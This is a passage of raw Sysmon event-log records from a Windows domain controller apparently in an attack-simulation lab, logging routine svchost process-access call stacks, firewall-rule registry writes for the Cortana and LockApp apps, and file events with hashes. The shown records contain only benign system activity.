ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.912{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.896{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{2D8803FC-C6C4-4857-9138-008066C3ACC8}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ|Edge=TRUE| 23542300x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.896{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{40D70A60-B2F6-48CE-99F6-2D7C7698A637}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9E0400DC-C1BF-4209-BAC8-7A2918DF75BC}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FB408827-D992-4BA6-940A-1209566C25F7}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5ED8A927-145B-48A7-86A2-904C6E5C9422}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E7276D86-555A-436C-B0B0-D6B64C301E0B}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7AD2DFB0-1DED-4662-9E03-6E49984C370D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{578DD007-6A23-46F0-B435-F60E7416EC9D}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{32760101-92F2-4769-BCC6-90C0C9C9813A}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.896{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{1A8173B4-C4E5-41E6-950A-C50EE8630427}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 11241100x80000000000000005298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.881{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.881 23542300x80000000000000005297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG2MD5=F045C633B9340D27547D12EECC7EE0B9,SHA256=9D04CBA5F699DF1AD06BC5541F85917A856292F181493393EC89EBF2980A1B3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1MD5=CD0B1FDF28910E391492F4807B474473,SHA256=EF923067C3091E773EB086A786D5E2FCA53B01EE8CE0A2EEB6704C85935CD2F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.datMD5=9C746CF42DB3B621537D8310CE3D4BE1,SHA256=52D93909D30105CE61FB14BD32AC9473BC627199AA83808B337F6D874CC46FDC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|M=microsoft.lockapp_cw5n1h2txyewy|Name=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\|PFN=Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy| 23542300x80000000000000005293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.865{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache131420250026721327.txtMD5=35CB8C19D2035D2165E1EFA7FA0ADF70,SHA256=5DCC967527060112D9824F3C852F5F1344613C12F2BEEAAF6D67A901E00B615F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9FA2AD00-9DCB-419C-A829-3001D4EAD2D6}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C95EB080-5351-417D-B73F-63D6EDD2B1EA}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.865{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{9808827F-09C5-4EE8-8B23-F28BBE9AB914}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.850{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3052D7F-90DE-4715-96BB-3BC0F6717376}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 23542300x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.850{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 